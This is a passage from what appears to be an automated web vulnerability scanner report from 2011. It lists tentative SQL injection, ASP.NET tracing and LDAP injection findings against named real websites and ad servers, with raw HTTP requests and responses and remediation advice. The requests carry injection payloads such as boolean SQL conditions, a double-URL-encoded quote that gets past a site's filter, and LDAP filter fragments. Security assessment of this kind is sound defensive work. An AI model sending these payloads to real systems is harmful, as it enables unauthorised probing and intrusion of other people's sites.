<li><a href="http://www.ndtv.com/article/india/turkish-airways-plane-still-stuck-in-mud-mumbai-runway-closed-130722">Turkish Airways plane still stuck in mud, Mumbai runway closed</a></li>
<li><a href="http://www.ndtv.com/article/cities/rich-haul-at-mumbai-airport-woman-caught-with-75k-euros-125914">Rich Haul at Mumbai airport: Woman caught with 75K Euros</a></li>
<li><a href="http://www.ndtv.com/article/cities/50-yr-old-nri-woman-caught-with-sex-toys-at-mumbai-airport-120385">50-yr-old NRI woman caught with sex toys at Mumbai airport </a></li>
<li><a href="http://www.ndtv.com/article/india/bangalore-police-on-toes-after-mumbai-blasts-119211">Bangalore police on toes after Mumbai blasts</a></li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-s-main-runway-shut-till-11-pm-flights-delayed/209811" title="Mumbai airport's main runway shut till 11 pm, flights delayed">
<img src="http://drop.ndtv.com/videothumb/thumb_209811_1315069236.jpg" width="75" height="60" alt="" />
<span>Mumbai airport's main runway shut till 11 pm, ...</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/mumbai-plane-skids-off-runway-closed/209620" title="Mumbai: Plane skids off, runway cl
...[SNIP]...

Request 2

GET /article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917?111599280%20or%201%3d2--%20=1 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAS_SC1=1315103177650; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.2.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=wijp1ux6nq7l2qhl

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 68808
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 03:36:44 GMT
Date: Sun, 04 Sep 2011 03:26:44 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-11-pm-flights-delayed-131003">Mumbai airport's main runway shut till 11 pm, flights delayed</a></li>
<li><a href="http://www.ndtv.com/article/india/turkish-airways-plane-still-stuck-in-mud-mumbai-runway-closed-130722">Turkish Airways plane still stuck in mud, Mumbai runway closed</a></li>
<li><a href="http://www.ndtv.com/article/cities/rich-haul-at-mumbai-airport-woman-caught-with-75k-euros-125914">Rich Haul at Mumbai airport: Woman caught with 75K Euros</a></li>
<li><a href="http://www.ndtv.com/article/cities/50-yr-old-nri-woman-caught-with-sex-toys-at-mumbai-airport-120385">50-yr-old NRI woman caught with sex toys at Mumbai airport </a></li>
<li><a href="http://www.ndtv.com/article/india/bangalore-police-on-toes-after-mumbai-blasts-119211">Bangalore police on toes after Mumbai blasts</a></li>
</ul>
</div>
<div class="clr"></div>
<div class="also_see_n">
<a class="prev prev_browse left"></a>
<div class="scrollable">
<div class="items">
<div class="item">
<a href="/video/player/news/mumbai-airport-s-main-runway-shut-till-11-pm-flights-delayed/209811" title="Mumbai airport's main runway shut till 11 pm, flights delayed">
<img src="http://drop.ndtv.com/videothumb/thumb_209811_1315069236.jpg" width="75" height="60" alt="" />
<span>Mumbai airport's main runway shut till 11 pm, ...</span>
</a>
</div>
<div class="item">
<a href="/video/player/news/mumbai-plane-skids-off-runway-closed/209620" title="Mumbai: Plane skids off
...[SNIP]...

1.14. http://www.networkadvertising.org/managing/optout_results.asp [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1'%20and%201%3d1--%20; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:42:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:42:04 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.4001276 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.317268 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=9.700519E-02 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.4922144 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.3065867 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking
...[SNIP]...

Request 2

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1'%20and%201%3d2--%20; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:42:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:42:04 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=5.845279E-02 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.9755932 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.7553304 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.1505396 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.9649119 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clickin
...[SNIP]...

1.15. http://www.ticketmaster.com/Sporting-Kansas-City-tickets/artist/805957 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ticketmaster.com
Path:   /Sporting-Kansas-City-tickets/artist/805957

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Sporting-Kansas-City-tickets/artist/805957?1%2527=1 HTTP/1.1
Host: www.ticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Server: Apache
X-TM-GTM-Origin: tmol-us-els1
Vary: Cookie,Accept-Encoding
Last-Modified: Sat, 03 Sep 2011 06:20:35 GMT
ETag: "a420-79c9f2c0"
Content-Length: 42016
Content-Type: text/html; charset=utf-8
Date: Sun, 04 Sep 2011 04:44:33 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NEWSEARCH=1; path=/; domain=.ticketmaster.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns=
...[SNIP]...

Request 2

GET /Sporting-Kansas-City-tickets/artist/805957?1%2527%2527=1 HTTP/1.1
Host: www.ticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash2
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR NID CURa ADMa DEVa PSAa OUR IND COM NAV INT"
Content-Type: text/html; charset=utf-8
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Date: Sun, 04 Sep 2011 04:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NEWSEARCH=1; path=/; domain=.ticketmaster.com
Set-Cookie: NDMA=261; path=/; domain=.ticketmaster.com
Set-Cookie: BRAND=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970
Set-Cookie: ORIGIN=; path=/; domain=.ticketmaster.com; expires=Thu Jan 1 00:00:00 1970
Content-Length: 353895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoc
...[SNIP]...

2. ASP.NET tracing enabled  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.tidaltv.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Issue background

ASP.NET tracing is a debugging feature which is designed for use during development to help troubleshoot problems. It discloses sensitive information to users, and if enabled in production contexts may present a serious security threat.

Application-level tracing enables any user to retrieve full details about recent requests to the application, including those of other users. This information includes session tokens and request parameters, which may enable an attacker to compromise other users and even take control of the entire application.

Page-level tracing returns the same information, but relating only to the current request. This may still contain sensitive data in session and server variables which would be of use to an attacker.

Issue remediation

To disable tracing, open the Web.config file for the application, and find the <trace> element within the <system.web> section. Either set the enabled attribute to "false" (to disable tracing) or set the localOnly attribute to "true" (to enable tracing only on the server itself).

Note that even with tracing disabled in this way, it is possible for individual pages to turn on page-level tracing either within the Page directive of the ASP.NET page, or programmatically through application code. If you observe tracing output only on some application pages, you should review the page source and the code behind, to find the reason why tracing is occurring.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

GET /trace.axd HTTP/1.0
Host: trk.tidaltv.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 03:21:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9761

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" width="100%">
...[SNIP]...

3. LDAP injection  previous  next
There are 7 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


3.1. http://ads.masslive.com/RealMedia/ads/adstream.cap [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.masslive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The c parameter appears to be vulnerable to LDAP injection attacks.

The payloads d50338daf3e58a8e)(sn=* and d50338daf3e58a8e)!(sn=* were each submitted in the c parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /RealMedia/ads/adstream.cap?c=d50338daf3e58a8e)(sn=*&va=1&e=30d HTTP/1.1
Host: ads.masslive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 1

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:44 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: d50338daf3e58a8e)(sn=*=1; expires=Tue, 04-Oct-11 04:02:44 GMT; path=/; domain=.masslive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:44 GMT;path=/;httponly

Request 2

GET /RealMedia/ads/adstream.cap?c=d50338daf3e58a8e)!(sn=*&va=1&e=30d HTTP/1.1
Host: ads.masslive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 2

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:45 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: d50338daf3e58a8e)!(sn=*=1; expires=Tue, 04-Oct-11 04:02:45 GMT; path=/; domain=.masslive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:45 GMT;path=/;httponly


3.2. http://ads.mlive.com/RealMedia/ads/adstream.cap [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.mlive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The c parameter appears to be vulnerable to LDAP injection attacks.

The payloads e3ef65172939bcb1)(sn=* and e3ef65172939bcb1)!(sn=* were each submitted in the c parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /RealMedia/ads/adstream.cap?c=e3ef65172939bcb1)(sn=*&va=1&e=30d HTTP/1.1
Host: ads.mlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 1

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:54 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: e3ef65172939bcb1)(sn=*=1; expires=Tue, 04-Oct-11 04:02:54 GMT; path=/; domain=.mlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:54 GMT;path=/;httponly

Request 2

GET /RealMedia/ads/adstream.cap?c=e3ef65172939bcb1)!(sn=*&va=1&e=30d HTTP/1.1
Host: ads.mlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 2

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:56 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: e3ef65172939bcb1)!(sn=*=1; expires=Tue, 04-Oct-11 04:02:56 GMT; path=/; domain=.mlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:56 GMT;path=/;httponly


3.3. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.oregonlive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The c parameter appears to be vulnerable to LDAP injection attacks.

The payloads da535e840f4ff729)(sn=* and da535e840f4ff729)!(sn=* were each submitted in the c parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /RealMedia/ads/adstream.cap?c=da535e840f4ff729)(sn=*&va=1&e=30d HTTP/1.1
Host: ads.oregonlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 1

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:01 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: da535e840f4ff729)(sn=*=1; expires=Tue, 04-Oct-11 04:02:01 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:01 GMT;path=/;httponly

Request 2

GET /RealMedia/ads/adstream.cap?c=da535e840f4ff729)!(sn=*&va=1&e=30d HTTP/1.1
Host: ads.oregonlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response 2

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:02 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: da535e840f4ff729)!(sn=*=1; expires=Tue, 04-Oct-11 04:02:02 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:02 GMT;path=/;httponly


3.4. http://oas.guardian.co.uk/adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://oas.guardian.co.uk
Path:   /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e

Issue detail

The c parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8dbd5612db703933)(sn=* and 8dbd5612db703933)!(sn=* were each submitted in the c parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e?c=8dbd5612db703933)(sn=*&dv=1&e=30d HTTP/1.1
Host: oas.guardian.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c

Response 1

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 8dbd5612db703933)(sn=*=1; expires=Tue, 04-Oct-11 04:00:54 GMT; path=/; domain=.guardian.co.uk
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

Request 2

GET /adstream.cap/b181bae0-fd63-4aed-9503-67ba46bf982e?c=8dbd5612db703933)!(sn=*&dv=1&e=30d HTTP/1.1
Host: oas.guardian.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c

Response 2

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 8dbd5612db703933)!(sn=*=1; expires=Tue, 04-Oct-11 04:00:54 GMT; path=/; domain=.guardian.co.uk
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


3.5. http://oasc12.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://oasc12.247realmedia.com
